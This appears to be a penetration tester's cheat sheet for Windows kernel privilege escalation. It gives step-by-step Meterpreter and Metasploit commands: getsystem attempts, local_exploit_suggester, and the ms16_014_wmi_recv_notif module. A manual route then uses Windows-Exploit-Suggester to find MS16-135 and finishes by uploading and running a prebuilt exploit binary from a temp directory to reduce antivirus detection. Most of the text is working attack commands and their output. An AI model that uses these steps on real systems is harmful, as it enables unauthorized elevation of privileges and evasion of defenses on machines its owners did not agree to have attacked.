Win Kernel Privesc

Get access to the target and gain a meterpreter session and then follow the following technique :-

#Local Privilege Escalation

# From the meterpreter session
getprivs

    Enabled Process Privileges
    ==========================
    Name
    ----
    SeChangeNotifyPrivilege
    SeIncreaseWorkingSetPrivilege

getsystem
    [-] priv_elevate_getsystem: Operation failed: 691 The following was attempted:
    [-] Named Pipe Impersonation (In Memory/Admin)
    [-] Named Pipe Impersonation (Dropper/Admin)
    [-] Token Duplication (In Memory/Admin)
    [-] Named Pipe Impersonation (RPCSS variant)
    [-] Named Pipe Impersonation (PrintSpooler variant)
    [-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
# failed

• Enumerate Windows Kernel vulnerabilities with Metasploit

Copy

background
search suggester
use post/multi/recon/local_exploit_suggester
sessions
set SESSION 7
run

• e.g. Windows WMI Receive Notification Exploit - ms16_014_wmi_recv_notif

  • This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl

use exploit/windows/local/ms16_014_wmi_recv_notif
set SESSION 7
set LPORT 4422
exploit

• By using a kernel exploit for this specific version of Windows O.S., the attacker is able to get a meterpreter session with elevated privileges.

#Manual Privilege Escalation

Windows-Exploit-Suggester

• Open a Kali VM terminal session and use Windows-Exploit-Suggester

mkdir Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
# ^^ This is a python3 version of the script

cd Windows-Exploit-Suggester
python ./windows-exploit-suggester.py --update
    [*] initiating winsploit version 3.3...
    [+] writing to file 2023-03-15-mssb.xls
    [*] done
pip install xlrd --upgrade

• Use https://cloudconvert.com/xlsx-to-xls to convert the 2023-03-15-mssb.xls file to .xlsx and back to .xls
• Run the script

Copy

./windows-exploit-suggester.py --database 2023-03-15-mssb.xls --systeminfo win2008r2-systeminfo.txt

MS16-135

• Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135)
• Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)

[E]MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*]  https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*]  https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*]  https://github.com/tinysec/public/tree/master/CVE-2016-7255

• Search MS16-135 in the windows-kernel-exploits github repository

  • MS16-135 exploit
  • check the 41015.c C file to check if the code does what it's supposed to
  • in this case I will use the pre-build executable 41015.exe

• Knowing that the specific Windows version is vulnerable to this particular exploit, proceed with the exploitation

Use the meterpreter access to upload the 41015.exe file to the temp directory within the Windows O.S.

cd C:\\
mkdir temp
cd temp\\
# Reduce the likelihood of antivirus detection by using the temp directory

upload 41015.exe
shell
.\41015.exe 7